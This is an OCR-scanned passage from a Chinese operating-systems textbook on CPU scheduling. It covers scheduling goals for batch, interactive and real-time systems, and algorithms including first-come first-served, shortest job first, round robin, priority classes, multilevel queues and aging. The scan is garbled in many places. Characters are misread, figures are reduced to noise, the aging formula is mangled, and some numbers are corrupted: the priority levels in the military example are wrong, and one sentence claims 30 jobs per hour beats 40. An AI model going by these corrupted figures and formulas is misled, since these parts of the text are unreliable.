毫 无 疑问 ， 不 同 的 环境 需要 不 同 的 调度 算法 。 之 所 以 出 现 这 种 情形 ， 是 因为 不 同 的 应 用 领域 (以 及 
不 同 的 操作 系统 ) 有 不 同 的 目标 。 换 句 话 说 ， 在 不 同 的 系统 中 ， 调 度 程序 的 优化 是 不 同 的。 这 里 有 必要 
划分 出 三 种 环境 : 

1) 批 处 理 。 

2) 交互 式 。 

3) 实时 。 
批 处 理 系统 在 商业 领域 仍 在 广泛 应 用 ， 用 来 处 理 薪 水 册 、 存 货 清 单 、 账 目 收入 、 账 目 支出 、 利 息 计 算 (在 
银行 )、 索 赔 处 理 (在 保险 公司 ) 和 其 他 的 周期 性 的 作业 。 在 批 处 理 系统 中 ， 不 会 有 用 户 不 耐烦 地 在 终端 
旁 等 待 一 个 短 请 求 的 快捷 响应 。 因 此 ， 非 抢占 式 算 法 ， 或 对 每 个 进程 都 有 长 时 间 周 期 的 抢占 式 算 法 ,通常 
都 是 可 接受 的 。 这 种 处 理 方式 减少 了 进程 的 切换 从 而 改善 了 性 能 。 这 些 批 处 理 算法 实际 上 相当 普及 ， 并 经 
常 可 以 应 用 在 其 他 场合 ， 这 使 得 人 们 值得 去 学 习 它 们 ， 甚 至 是 对 于 那些 没有 接触 过 大 型 机 计算 的 人 们 。 

在 交互 式 用 户 环境 中 ， 为 了 避免 一 个 进程 霸占 CPU 拒绝 为 其 他 进程 服务 ， 抢 占 是 必需 的 。 即 便 没 有 
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进程 想 永远 运行 ， 但 是 ， 某 个 进程 由 于 一 个 程序 错误 也 可 能 无 限期 地 排斥 所 有 其 他 进程 。 为 了 避免 这 种 
现象 发 生 ， 抢 占 也 是 必要 的 。 服 务 器 也 归于 此 类 ， 因 为 通常 它们 要 服务 多 个 突 发 的 (远程 ) AP. 

然而 在 有 实时 限制 的 系统 中 ， 抢 占有 时 是 不 需要 的 ， 因 为 进程 了 解 它们 可 能 会 长 时 间 得 不 到 运行 ， 
所 以 通常 很 快 地 完成 各 自 的 工作 并 阻塞 。 实 时 系统 与 交互 式 系统 的 差别 是 ， 实 时 系统 只 运行 那些 用 来 推 
进 现 有 应 用 的 程序 ， 而 交互 式 系统 是 通用 的 ， 它 可 以 运行 任意 的 非 协作 甚至 是 有 恶意 的 程序 。 


4. 调度 算法 的 目标 

为 了 设计 调度 算法 ， 有 必要 考虑 什么 是 一 个 好 的 
调度 算法 。 某 些 目标 取决 于 环境 〈 批 处 理 、 交 互 式 或 
实时 ) ， 但 是 还 有 一 些 目标 是 适用 于 所 有 情形 的 。 在 图 
2-40 中 列 出 了 一 些 目标 ， 我 们 将 在 下 面 逐 一 讨论 。 

在 所 有 的 情形 中 ， 公 平 是 很 重要 的 。 相 似 的 进程 
应 该 得 到 相似 的 服务 。 对 一 个 进程 给 予 较 其 他 等 价 的 
进程 更 多 的 CPU 时 间 是 不 公平 的 。 当 然 ， 不 同类 型 的 
进程 可 以 采用 不 同方 式 处 理 。 可 以 考虑 一 下 在 核反应 
堆 计算 机 中 心安 全 控制 与 发 放 薪 水 处 理 之 间 的 差别 。 

与 公平 有 关 的 是 系统 策略 的 强制 执行 。 如 果 局 部 
策略 是 ， 只 要 需要 就 必须 运行 安全 控制 进程 (即便 这 
意味 着 推迟 30 秒 钟 发 薪 ) ， 那 么 调度 程序 就 必须 保证 


所 有 系统 
公平 一 一 给 每 个 进程 公平 的 CPU 份额 
策略 强制 执行 一 一 保证 规定 的 策略 被 执行 
平衡 一 一 保持 系统 的 所 有 部 分 都 忙碌 
批 处 理 系统 
吞吐 量 一 一 每 小 时 最 大 作业 数 
周转 时 间 一 一 从 提交 到 终止 间 的 最 小 时 间 


CPU 利用 率 一 一 保持 CPU 始终 忙碌 
交互 式 系统 

响应 时 间 一 一 快速 响应 请 求 

均衡 性 一 一 满足 用 户 的 期 望 
实时 系统 

满足 截止 时 间 一 一 避免 丢失 数据 





可 预测 性 一 在 多 媒体 系统 中 避免 品质 降低 


能 够 强制 执行 该 策略 。 

另 一 个 共同 的 目标 是 保持 系统 的 所 有 部 分 尽 可 能 
忙碌 。 如 果 CPU 和 所 有 I/O 设 备 能 够 始终 运行 ， 那 么 
相对 于 让 某 些 部 件 空转 而 言 ， 每 秒 钟 就 可 以 完成 更 多 的 工作 。 例 如 ， 在 批 处 理 系统 中 ， 调 度 程序 控制 哪 
个 作业 调 人 内 存 运 行 。 在 内 存 中 既 有 一 些 CPU 密集 型 进程 又 有 一 些 IO 密集 型 进程 是 一 个 较 好 的 想法 ， 
好 于 先 调 入 和 运行 所 有 的 CPU 密集 型 作业 ， 然 后 在 它们 完成 之 后 再 调和 信和 运行 所 有 IO 密集 型 作业 的 做 
法 。 如 果 使 用 后 面 一 种 策略 ， 在 CPU 密集 型 进程 运行 时 ， 它 们 就 要 竞争 CPU ， 而 磁盘 却 在 空转 。 稍 后 ， 
当 LO 密 集 型 作业 来 了 之 后 ， 它 们 要 为 磁盘 而 竞争 ， 而 CPU 又 空转 了 。 显 然 ， 通 过 仔细 组 合 进程 ， 可 以 
保持 整个 系统 运行 得 更 好 一 些 。 

运行 大 量 批 处 理 作 业 的 大 型 计算 中 心 的 管理 者 们 为 了 掌握 其 系统 的 工作 状态 ， 通 常 检查 三 个 指标 : 
吞吐 量 、 周 转 时 间 以 及 CPU 利 用 率 。 香 吐 量 (throughout) 是 系统 每 小 时 完成 的 作业 数量 。 把 所 有 的 因 
素 考 虑 进去 之 后 ， 每 小 时 完成 30 个 作业 好 于 每 小 时 完成 40 个 作业 。 周 转 时 间 (turnaround time) 是 指 从 
一 个 批 处 理 作业 提交 时 刻 开 始 直到 该 作业 完成 时 刻 为 止 的 统计 平均 时 间 。 该 数据 度量 了 用 户 要 得 到 输出 
所 需 的 平均 等 待 时 间 。 其 规则 是 : 小 就 是 好 的 。 

能 够 使 吞吐 量 最 大 化 的 调度 算法 不 一 定 就 有 最 小 的 周转 时 间 。 例 如 ， 对 于 确定 的 短 作 业 和 长 作业 的 
一 个 组 合 ， 总 是 运行 短 作 业 而 不 运行 长 作业 的 调度 程序 ， 可 能 会 获得 出 色 的 吞吐 性 能 (每 小 时 大 量 的 短 
作业 ) ， 但 是 其 代价 是 对 于 长 的 作业 周转 时 间 很 差 。 如 果 短 作业 以 一 个 稳定 的 速率 不 断 到 达 ， 长 作业 可 
能 根本 运行 不 了 ， 这 样 平均 周转 时 间 是 无 限 长 ， 但 是 得 到 了 高 的 吞吐 量 。 

CPU 利用 率 常常 用 于 对 批 处 理 系统 的 度量 。 尽 管 这 样 ，CPU 利 用 率 并 不 是 一 个 好 的 度量 参数 。 真 正 
有 价值 的 是 ， 系 统 每 小 时 可 完成 多 少 作 业 (吞吐 量 ) ， 以 及 完成 作业 需要 多 长 时 间 (周转 时 间 ) 。 把 CPU 
利用 率 作为 度量 依据 ， 就 像 用 引擎 每 小 时 转动 了 多 少 次 来 比较 汽车 的 好 坏 一 样 。 另 一 方面 ， 知 道 什 么 时 
候 CPU 利 用 率 接近 100% 比 知道 什么 时 候 要 求 得 到 更 多 的 计算 能 力 要 有 用 。 

对 于 交互 式 系 统 ， 则 有 不 同 的 指标 。 最 重要 的 是 最 小 响应 时 间 ， 即 从 发 出 命令 到 得 到 响应 之 间 的 时 
间 。 在 有 后 台 进 程 运行 (例如 ， 从 网 络 上 读 取 和 存储 电子 邮件 ) 的 个 人 计算 机 上 ， 用 户 请 求 启动 一 个 程 
序 或 打开 一 个 文件 应 该 优先 于 后 台 的 工作 。 能 够 让 所 有 的 交互 式 请 求 首先 运行 的 则 是 好 服务 。 

一 个 相关 的 问题 是 均衡 性 。 用 户 对 做 一 件 事 情 需 要 多 长 时 间 总 是 有 一 种 固有 的 (不 过 通常 不 正确 ) 
看 法 。 当 认为 一 个 请 求 很 复杂 需要 较 多 的 时 间 时 ， 用 户 会 接受 这 个 看 法 ， 但 是 当 认为 一 个 请 求 很 简单 ， 


图 2-40 在 不 同 环境 中 调度 算法 的 一 些 目标 
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但 也 需要 较 多 的 时 间 时 ， 用 户 就 会 急躁 。 例 如 ， 如 果 点 击 一 个 图 标 花费 了 60 秒 钟 发 送 完成 一 份 传 真 ， 用 
户 大 概 会 接受 这 个 事实 ， 因 为 他 没有 期 望花 5 秒 钟 得 到 传真 ， 他 知道 这 需要 些 时 间 。 

另 一 方面 ， 当 传真 发 送 完成 ， 用 户 点 击 断 开 电话 连接 的 图 标 时 ， 该 用 户 就 有 不 一 样 的 期 待 了 。 如 果 
30 秒 之 后 还 没有 完成 断 开 操作 ， 用 户 就 可 能 会 抱怨 ， 而 60 秒 之 后 ， 他 就 要 气 得 要 命 了 。 之 所 以 有 这 种 行 
为 ， 其 原因 是 : 一 般 用 户 认 为 拿 起 听 简 并 建立 通话 连接 所 需 的 时 间 要 比 挂 掉 电话 所 需 的 时 间 长 。 在 有 些 
情形 下 (如 本 例 )， 调 度 程序 对 响应 时 间 指 标 起 不 了 作用 ; 但 是 在 另外 一 些 情形 下 ， 调 度 程序 还 是 能 够 
做 一 些 事 的 ， 特 别 是 在 出 现 差 的 进程 顺序 选择 时 。 

实时 系统 有 着 与 交互 式 系统 不 一 样 的 特性 ， 所 以 有 不 同 的 调度 目标 。 实 时 系统 的 特点 是 或 多 或 少 必 
须 满 足 截止 时 间 。 例 如 ， 如 果 计 算 机 正在 控制 一 个 以 正常 速率 产生 数据 的 设备 ， 若 一 个 按时 运行 的 数据 
收集 进程 出 现 失 败 ， 会 导致 数据 丢失 。 所 以 ， 实 时 系统 最 主要 的 要 求 是 满足 所 有 的 (或 大 多 数 ) 截止 时 
间 要 求 。 

在 多 数 实 时 系统 中 ， 特 别 是 那些 涉及 多 媒体 的 实时 系统 中 ， 可 预测 性 是 很 重要 的 。 偶 尔 不 能 满足 截 
止 时间 要 求 的 问题 并 不 严重 ， 但 是 如 果 音 频 进 程 运行 的 错误 太 多 ， 那 么 音质 就 会 下 降 得 很 快 。 视 频 品质 
也 是 一 个 问题 ， 但 是 人 的 耳 人 条 比 眼睛 对 拌 动 要 敏感 得 多 。 为 了 避免 这 些 问 题 ， 进 程 调度 程序 必须 是 高 度 
可 预测 和 有 规律 的 。 本 章 介绍 批 处 理 系统 和 交互 式 系统 中 的 调度 算法 。 本 书 不 介绍 实时 系统 的 调度 算法 。 


2.4.2 批 处 理 系 统 中 的 调度 

现在 从 一 般 的 调度 处 理 问题 转向 特定 的 调度 算法 。 在 这 一 节 中 ， 我 们 将 考察 在 批 处 理 系 统 中 使 用 的 
算法 ， 随 后 将 讨论 交互 式 和 实时 系统 中 的 调度 算法 。 有 必要 指出 ， 某 些 算法 既 可 以 用 在 批 处 理 系统 中 ， 
也 可 以 用 在 交互 式 系统 中 。 我 们 将 稍 后 讨论 这 个 问题 。 

1. 先 来 先 服务 

在 所 有 调度 算法 中 ， 最 简单 的 是 非 抢占 式 的 先 来 先 服务 (first-come first-served) 算法 。 使 用 该 算 
法 ， 进 程 按照 它们 请 求 CPU 的 顺序 使 用 CPU。 基 本 上 ， 有 一 个 就 绪 进 程 的 单一 队列 。 上 午 ， 当 第 一 个 作 
业 从 外 部 进入 系统 后 ， 就 立即 开始 并 允许 运行 它 所 期 望 的 时 间 长 度 ， 该 作业 不 会 因为 运行 太 长 时 间 而 被 
中 断 。 当 其 他 作业 进入 时 ， 它 们 排 到 就 绪 队 列 尾 部 。 当 正在 运行 的 进程 被 阻塞 时 ， 就 绪 队 列 中 的 第 一 个 
进程 接着 运行 。 当 在 被 阻塞 的 进程 变 为 就 绪 时 ， 就 像 一 个 新 来 到 的 作业 一 样 ， 排 到 就 绪 队 列 的 末尾 ， 即 
排 在 所 有 进程 最 后 。 

这 个 算法 的 主要 优点 是 易于 理解 并 且 便 于 在 程序 中 运用 。 就 难以 得 到 的 体育 或 音乐 会 票 的 分 配 问题 
而 言 ， 这 对 那些 愿意 在 早上 两 点 就 去 排队 的 人 们 也 是 公平 的 。 在 这 个 算法 中 ， 一 个 单 链表 记录 了 所 有 就 
绪 进程 。 要 选取 一 个 进程 运行 ， 只 要 从 该 队列 的 头 部 移 走 一 个 进程 即 可 ， 要 添加 一 个 新 的 作业 或 阻塞 一 
个 进程 ， 只 要 把 该 作业 或 进程 附加 在 相应 队列 的 末尾 即 可 。 还 有 比 这 更 简单 的 理解 和 实现 吗 ? 

不 过 ， 先 来 先 服务 也 有 明显 的 缺点 。 假 设 有 一 个 一 次 运行 1 秒 钟 的 计算 密集 型 进程 和 很 少 使 用 CPU 
但 是 每 个 都 要 进行 1000 次 磁盘 读 操作 才能 完成 的 大 量 IO 密 集 型 进程 存在 。 计 算 密集 进程 运行 1 秒 钟 ， 接 
着 读 一 个 磁盘 块 。 所 有 的 IO 进程 开始 运行 并 读 磁 盘 。 当 该 计算 密集 进程 获得 其 磁盘 块 时 ， 它 运行 下 一 
个 1 秒 钟 ， 紧 跟随 着 的 是 所 有 IO 进程 。 

这 样 做 的 结果 是 ， 每 个 IO 进程 在 每 秒 钟 内 读 到 一 个 磁盘 块 ， 要 花费 1000 秒 钟 才能 完成 操作 。 如 果 
有 一 个 调度 算法 每 10ms 抢 占 计算 密集 型 进程 ， 那 么 LO 进程 将 在 10 秒 钟 内 完成 而 不 是 1000 秒 钟 ， 而 且 还 
不 会 对 计算 密集 型 进程 产生 多 少 延迟 。 

2. 最 短 作业 优先 

现在 来 看 一 种 适用 于 运行 时 间 可 以 预知 的 另 一 个 非 抢 占 式 的 批 处 理 调度 算法 。 例如 , 一 家 保险 公 
因为 每 天 都 做 类 似 的 工作 ， 所 以 人 们 可 以 相当 精确 地 预测 处 理 1000 个 索赔 的 一 批 作业 需要 多 少时 间 。 
输入 队列 中 有 若干 个 同等 重要 的 作业 被 启动 时 ， 调 度 程 序 应 使 用 最 短 作 业 优先 (shortest job first) 算法 ， 
请 看 图 2-41。 这 里 有 4 个 作业 A、B、C、D， 运 行 时 间 分 别 为 8、4、4、4 分 钟 。 若 按 图 中 的 次 序 运行 ， 则 
A 的 周转 时 间 为 8 分 钟 ，B 为 12 分 钟 ，C 为 16 分 钟 ，D 为 20 分 钟 ， 平 均 为 14 分 钟 。 

现在 考虑 使 用 最 短 作 业 优 先 算法 运行 这 4 个 作业 ， 如 图 2-41b 所 示 。 目 前 周转 时 间 分 别 为 4、8、12 和 
20 分 钟 ， 平 均 为 11 分 钟 。 可 以 证 明 最 短 作业 优先 是 最 优 的 。 考 虑 有 4 个 作业 的 情况 ， 其 运行 时 间 分 别 为 a、 
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b、c、d。 第 一 个 作业 在 时 间 a 结 束 ， 第 二 个 在 时 间 a + b 结 束 ， 以 此 类 推 。 平 均 周转 时 间 为 (4a + 3b + 2c + 
d) /4。 显 然 a 对 平均 值 影响 最 大 ， 所 以 它 应 是 最 短 作业 ， 其 次 是 b， 再 次 是 c， 最 后 的 d 只 影响 它 自己 的 周 
转 时 间 。 对 任意 数目 作业 的 情况 ， 道 理 完全 一 样 。 


8 "EE ae | 六 ee 8 
a) b) 


图 2-41 最 短 作业 优先 调度 的 例子 : a) 按 原 有 次 序 运行 4 个 作业 ，b) 按 最 短 作 业 优 先 次 序 运行 


有 必要 指出 ， 只 有 在 所 有 的 作业 都 可 同时 运行 的 情形 下 ， 最 短 作 业 优先 算法 才 是 最 优化 的 。 作 为 一 
个 反例 ， 考 虑 5 个 作业 ， 从 A 到 E， 运 行 时 间 分 别 是 2、4、1、1 和 1。 它 们 的 到 达 时 间 是 0、0、3、3 和 3。 
开始 ， 只 能 选择 A 或 B， 因 为 其 他 三 个 作业 还 没有 到 达 。 使 用 最 短 作业 优先 ， 将 按照 A、B、C、D、E 的 
顺序 运行 作业 ， 其 平均 等 待 时 间 是 4.6。 但 是 ， 按 照 B、C、D、E、A 的 顺序 运行 作业 ， 其 平均 等 待 时 间 
则 是 4.4。 

3. 最 短 剩余 时 间 优先 

最 短 作 业 优 先 的 抢占 式 版 本 是 最 短 剩余 时 间 优 先 (shortest remaining time next) 算法 。 使 用 这 个 算 
法 ， 调 度 程序 总 是 选择 剩余 运行 时 间 最 短 的 那个 进程 运行 。 再 次 提醒 ， 有 关 的 运行 时 间 必 须 提 前 掌握 。 
当 一 个 新 的 作业 到 达 时 ， 其 整个 时 间 同 当前 进程 的 剩余 时 间 做 比较 。 如 果 新 的 进程 比 当 前 运行 进程 需要 
更 少 的 时 间 ， 当 前 进程 就 被 挂 起 ， 而 运行 新 的 进程 。 这 种 方式 可 以 使 新 的 短 作业 获得 良好 的 服务 。 


243 交互 式 系统 中 的 调度 

现在 考察 用 于 交互 式 系统 中 的 一 些 调 度 算法 ， 它 们 在 个 人 计算 机 、 服 务 器 和 其 他 类 系统 中 都 是 常用 的 。 

1. 轮转 调度 

一 种 最 古老 、 最 简单 、 最 公平 且 使 用 最 广 的 算法 是 轮转 调度 (round robin) 。 每 个 进程 被 分 配 一 个 
时 间 段 ， 称 为 时 间 片 (quantum), ， 即 允许 该 进程 在 该 时 间 段 中 运行 。 如 果 在 时 间 片 结束 时 该 进程 还 在 运 
行 ， 则 将 剥夺 CPU 并 分 配给 另 一 个 进程 。 如 果 该 进程 在 时 间 片 结束 前 阻塞 或 结束 ， 则 CPU 立即 进行 切换 。 
时 间 片 轮转 调度 很 容易 实现 ， 调 度 程 序 所 要 做 的 就 是 维护 一 张 可 运行 进程 列表 ， 如 图 2-42a 所 示 。 当 一 
个 进程 用 完 它 的 时 间 片 后 ， 就 被 移 到 队列 的 末尾 ， 如 图 2-42b 所 示 。 

时 间 片 轮转 调度 中 唯一 有 趣 的 一 点 是 时 间 片 的 长 度 。 从 一 个 进程 切换 到 另 一 个 进程 是 需要 一 定时 间 
进行 管理 事务 处 理 的 一 一 保存 和 装 和 人 寄存 器 值 及 内 存 映像 、 更 新 各 种 表格 和 列表 、 清 除 和 重新 调和 人 内存 
高 速 缓存 等 。 假 如 进程 切换 (process switch) ， 有 时 称 为 上 下 文 切 换 (context switch) ， 需 要 lms， 包 括 
切换 内 存 映像 、 清 除 和 重新 调 入 高 速 缓存 等 。 再 假设 时 间 片 设 为 4ms。 有 了 这 些 参数 ， 则 CPU 在 做 完 
4ms 有 用 的 工作 之 后 ，CPU 将 花费 ( 即 浪费 ) lms 来 进行 进程 切换 。 因 此 ，CPU 时 间 的 20% 浪 费 在 管理 开 
销 上 。 很 明显 ， 管 理 时 间 太 多 了 。 


下 一 个 
当前 进程 进程 当前 进程 
[B| [eHe Ha] [eHe] 回 
a) b) 


图 2-42 轮转 调度 : a) 可 运行 进程 列表 ，b) 进程 B 用 完 时 间 片 后 的 可 运行 进程 列表 


为 了 提高 CPU 的 效率 ， 可 以 将 时 间 片 设置 成 ， 比 方 说 100ms， 这 样 浪费 的 时 间 只 有 1 多 。 但 是 ， 如 果 
在 一 段 非常 短 的 时 间 间 隔 内 到 达 50 个 请 求 ， 并 且 对 CPU 有 不 同 的 需求 ， 那 么 ， 考 虑 一 下 ， 在 一 个 服务 器 
系统 中 会 发 生 什么 呢 ? 50 个 进程 会 放 在 可 运行 进程 的 列表 中 。 如 果 CPU 是 空闲 的 ， 第 一 个 进程 会 立即 开 
始 执行 ， 第 二 个 直到 100ms 以 后 才 会 启动 ， 以 此 类 推 。 假 设 所 有 其 他 进程 都 用 足 了 它们 的 时 间 片 的 话 ， 
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”最 不 幸 的 是 最 后 一 个 进程 在 获得 运行 机 会 之 前 将 不 得 不 等 待 5 秒 钟 。 大 部 分 用 户 会 认为 5 秒 的 响应 对 于 一 
“个 短命 令 来 说 是 缓慢 的 。 如 果 一 些 在 就 绪 队列 后 边 的 请 求 仅 需要 几 毫 秒 的 CPU 时 间 ， 上 面 的 情况 会 变 得 
尤其 糟糕 。 如 果 使 用 较 短 的 时 间 片 的 话 ， 它 们 将 会 获得 更 好 的 服务 。 

另 一 个 因素 是 ， 如 果 时 间 片 设置 长 于 平均 的 CPU 突 发 时 间 ， 那 么 不 会 经 常 发 生 抢占 。 相 反 ， 在 时 间 
片 耗费 完 之 前 多 数 进程 会 完成 一 个 阻塞 操作 ， 引 起 进程 的 切换 。 抢 占 的 消失 改善 了 性 能 ， 因 为 进程 切换 
只 会 发 生 在 确实 逻辑 上 有 需要 的 时 候 ， 即 进程 被 阻塞 不 能 够 继续 运行 。 

可 以 归结 如 下 结论 : 时 间 片 设 得 太 短 会 导致 过 多 的 进程 切换 ， 降 低 了 CPU 效 率 ， 而 设 得 太 长 又 可 能 
引起 对 短 的 交互 请 求 的 响应 时 间 变 长 。 将 时 间 片 设 为 20 一 50ms 通 常 是 一 个 比较 合理 的 折 中 。 

2. 优先 级 调度 

轮转 调度 做 了 一 个 隐 含 的 假设 ， 即 所 有 的 进程 同等 重要 ， 而 拥有 和 操作 多 用 户 计算 机 系统 的 人 对 此 
常 有 不 同 的 看 法 。 例 如 ， 在 一 所 大 学 里 ， 等 级 顺序 可 能 是 教务 长 首先 ， 然 后 是 教授 、 秘 书 、 后 勤 人 员 ， 
最 后 是 学 生 。 这 种 将 外 部 因素 考虑 在 内 的 需要 就 导致 了 优先 级 调度 。 其 基本 思想 很 清楚 : 每 个 进程 被 赋 
予 一 个 优先 级 ， 人 允许 优先 级 最 高 的 可 运行 进程 先 运行 。 

即使 在 只 有 一 个 用 户 的 PC 上 ， 也 会 有 多 个 进程 ， 其 中 一 些 比 另 一 些 更 重要 。 例 如 ， 与 在 屏幕 上 实 
时 显示 视频 电影 的 进程 相 比 ， 在 后 台 发 送 电子 邮件 的 守护 进程 应 该 被 赋予 较 低 的 优先 级 。 

为 了 防止 高 优先 级 进程 无 休止 地 运行 下 去 ， 调 度 程序 可 能 在 每 个 时 钟 滴答 ( 即 每 个 时 钟 中 断 ) 降低 当前 
进程 的 优先 级 。 如 果 这 一 行为 导致 该 进程 的 优先 级 低 于 次 高 优先 级 的 进程 ， 则 进行 进程 切换 。 另 一 种 方法 是 ， 
给 每 个 进程 赋予 一 个 允许 运行 的 最 大 时 间 片 ， 当 用 完 这 个 时 间 片 时 ， 次 高 优先 级 的 进程 便 获得 运行 机 会 。 

优先 级 可 以 是 静态 赋予 或 动态 赋予 。 在 一 台 军 用 计算 机 上 ， 可 以 把 将 军 所 启动 的 进程 设 为 优先 级 
100， 上 校 为 00， 少 校 为 80， 上 尉 为 9， 中 尉 为 60， 以 此 类 推 。 或 者 ， 在 一 个 商业 计算 中 心 ， 高 优先 级 
作业 每 小 时 费用 为 100 美 元 ， 中 优先 级 每 小 时 75 美 元 ， 低 优先 级 每 小 时 50 美 元 。UNIX 系 统 中 有 一 条 命令 
nice， 它 允许 用 户 为 了 照顾 别人 而 自愿 降低 自己 进程 的 优先 级 ， 但 从 未 有 人 用 过 它 。 

为 达到 某 种 目的 ， 优 先 级 也 可 以 由 系统 动态 确定 。 例 如 ， 有 些 进程 为 0 密集 型 ， 其 多 数 时 间 用 来 
等 待 JO 结 束 。 当 这 样 的 进程 需要 CPU 时 ， 应 立即 分 配给 它 CPU， 以 便 启 动 下 一 个 IO 请 求 ， 这 样 就 可 以 
在 另 一 个 进程 计算 的 同时 执行 IO 操作 。 使 这 类 IO 密集 型 进程 长 时 间 等 待 CPU 只 会 造成 它 无 谓 地 长 时 间 
占用 内 存 。 使 /O 密 集 型 进程 获得 较 好 服务 的 一 种 简单 算法 是 ， 将 其 优先 级 设 为 1/f，f 为 该 进程 在 上 一 时 
间 片 中 所 占 的 部 分 。 一 个 在 其 50ms 的 时 间 片 中 只 使 用 1ms 的 进程 将 获得 优先 级 50， 而 在 阻塞 之 前 用 掉 
25ms 的 进程 将 具有 优先 级 2， 而 使 用 掉 全 部 时 间 片 的 进程 将 得 到 优先 级 1。 

可 以 很 方便 地 将 一 组 进程 按 优先 级 分 成 若干 类 ， 并 
且 在 各 类 之 间 采 用 优先 级 调度 ， 而 在 各 类 进程 的 内 部 采 队列 头 可 运行 进程 
用 轮转 调度 。 图 2-43 给 出 了 一 个 有 4 类 优先 级 的 系统 ， 其 (最 高 优先 级 ) 
调度 算法 如 下 : 只 要 存在 优先 级 为 第 4 类 的 可 运行 进程 ， 
就 按照 轮转 法 为 每 个 进程 运行 一 个 时 间 片 ， 此 时 不 理会 
较 低 优先 级 的 进程 。 若 第 4 类 进程 为 空 ， 则 按照 轮转 法 运 
行 第 3 类 进程 。 若 第 4 类 和 第 3 类 均 为 空 ， 则 按 轮 转 法 运行 
第 2 类 进程 。 如 果 不 偶尔 对 优先 级 进行 调整 ， 则 低 优 先 级 
进程 很 可 能 会 产生 饥饿 现象。 

3. 多 级 队列 

CTSS (Compatible Time Sharing System), ，M.LT. 在 IBM 7094 上 开发 的 兼容 分 时 系统 (Corbat6 等 

人 ，1962)， 是 最 早 使 用 优先 级 调度 的 系统 之 一 。 但 是 在 CTSS 中 存在 进程 切换 速度 太 慢 的 问题 ， 其 原因 
” 是 IBM 7094 内 存 中 只 能 放 进 一 个 进程 ， 每 次 切换 都 需要 将 当前 进程 换 出 到 磁盘 ， 并 从 磁盘 上 读 入 一 个 新 
进程 。CTSS 的 设计 者 很 快 便 认 识 到 ， 为 CPU 密集 型 进程 设置 较 长 的 时 间 片 比 频繁 地 分 给 它们 很 短 的 时 
间 片 要 更 为 高 效 (减少 交换 次 数 ) 。 另 一 方面 ， 如 前 所 述 ， 长 时 间 片 的 进程 又 会 影响 到 响应 时 间 ， 其 解 
决 办 法 是 设立 优先 级 类 。 属 于 最 高 优先 级 类 的 进程 运行 一 个 时 间 片 ， 属 于 次 高 优先 级 类 的 进程 运行 2 个 
时 间 片 ， 再 次 一 级 运行 4 个 时 间 片 ， 以 此 类 推 。 当 一 个 进程 用 完 分 配 的 时 间 片 后 ， 它 被 移 到 下 一 类 。 





(最 低 优先 级 ) 


图 2-43 有 4 个 优先 级 类 的 调度 算法 
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作为 一 个 例子 , 考虑 有 一 个 进程 需要 连续 计算 100 个 时 间 片 。 它 最 初 被 分 配 1 个 时 间 片 ,然后 被 换 出 。 
下 次 它 将 获得 2 个 时 间 片 ， 接 下 来 分 别 是 4、8、16、32 和 64。 当 然 最 后 一 次 它 只 使 用 64 个 时 间 片 中 的 37 
个 便 可 以 结束 工作 。 该 进程 需要 7 次 交换 (包括 最 初 的 装 入 ) ， 而 如 果 采 用 纯粹 的 轮转 算法 则 需要 100 次 
交换 。 而 且 ， 随 着 进程 优先 级 的 不 断 降低 ， 它 的 运行 频 度 逐 渐 放 慢 ， 从 而 为 短 的 交互 进程 让 出 CPU。 

对 于 那些 刚 开始 运行 一 段 长 时 间 ， 而 后 来 又 需要 交互 的 进程 ,为 了 防止 鼻 永 远 处 于 被 惩罚 状态 ， 可 
以 采取 下 面 的 策略 。 只 要 终端 上 有 回 车 键 (Enter 键 ) 按 下 ， 则 属于 该 终端 的 所 有 进程 就 都 被 移 到 最 高 优 
先 级 ， 这 样 做 的 原因 是 假设 此 时 进程 即将 需要 交互 。 但 可 能 有 一 天 ， 一 台 CPU 密 集 的 重 载 机 器 上 有 几 个 
用 户 侦 然 发 现 ， 只 需 坐 在 那里 随机 地 每 隔 几 秒 钟 敲 一 下 回 车 键 就 可 以 大 大 提高 响应 时 间 。 于 是 他 们 又 告 
诉 他 们 的 朋友 …… 这 个 故事 的 寓意 是 : 在 实践 上 可 行 比 理论 上 可 行 要 困难 得 多 。 

4. 最 短 进程 优先 

对 于 批 处 理 系统 而 言 ， 由 于 最 短 作业 优先 常常 伴随 着 最 短 响应 时 间 ， 所 以 如 果 能 够 把 它 用 于 交互 进 
程 ， 那 将 是 非常 好 的 。 在 某 种 程度 上 ， 的 确 可 以 做 到 这 一 点 。 交 互 进程 通常 遵循 下 列 模式 : 等 待命 令 、 
执行 命令 、 等 待命 令 、 执 行 命令 ， 如 此 不 断 反复 。 如 果 将 每 一 条 命令 的 执行 看 作 是 一 个 独立 的 “作业 ”， 
则 我 们 可 以 通过 首先 运行 最 短 的 作业 来 使 响应 时 间 最 短 。 这 里 唯一 的 问题 是 如 何 从 当前 可 运行 进程 中 找 
出 最 短 的 那 一 个 进程 。 

一 种 办 法 是 根据 进程 过 去 的 行为 进行 推测 ， 并 执行 估计 运行 时 间 最 短 的 那 一 个 。 假 设 某 个 终端 上 每 
条 命令 的 估计 运行 时 间 为 T,6。 现 在 假设 测量 到 其 下 一 次 运行 时 间 为 T|。 可 以 用 这 两 个 值 的 加 权 和 来 改进 
估计 时 间 ， 即 a76。 + (1 一 Q)T1。 通 过 选择 a 的 值 ， 可 以 决定 是 尽快 忘掉 老 的 运行 时 间 ， 还 是 在 一 段 长 时 间 
内 始终 记 住 它们 。 当 a = 1/2 时 ， 可 以 得 到 如 下 序列 : 

To, To/2+T,/2, TY4 + TI/4+T/2,: To/8 + T,/8 + Tp/4 + T32 
可 以 看 到 ， 在 三 轮 过 后 ，To 在 新 的 估计 值 中 所 占 的 比重 下 降 到 1/8。 

有 时 把 这 种 通过 当前 测量 值 和 先前 估计 值 进行 加 权 平 均 而 得 到 下 一 个 估计 值 的 技术 称 作 老化 
(aging) 。 它 适用 于 许多 预测 值 必须 基于 先前 值 的 情况 。 老 化 算法 在 a = 1/2 时 特别 容易 实现 ， 只 需 将 新 值 
加 到 当前 估计 值 上 ， 然 后 除 以 2 〈 即 右 移 一 位 ) 。 

5. 保证 调度 

一 种 完全 不 同 的 调度 算法 是 向 用 户 作出 明确 的 性 能 保证 ， 然 后 去 实现 它 。 一 种 很 实际 并 很 容易 实现 
的 保证 是 : 车 用 户 工作 时 有 rt 个 用 户 登录 ， 则 用 户 将 获得 CPU 处 理 能 力 的 1/n。 类 似 地 ， 在 一 个 有 n 个 进 
程 运行 的 单 用 户 系 统 中 ， 若 所 有 的 进程 都 等 价 ， 则 每 个 进程 将 获得 1/n 的 CPU 时 间 。 看 上 去 足够 公平 了 。 

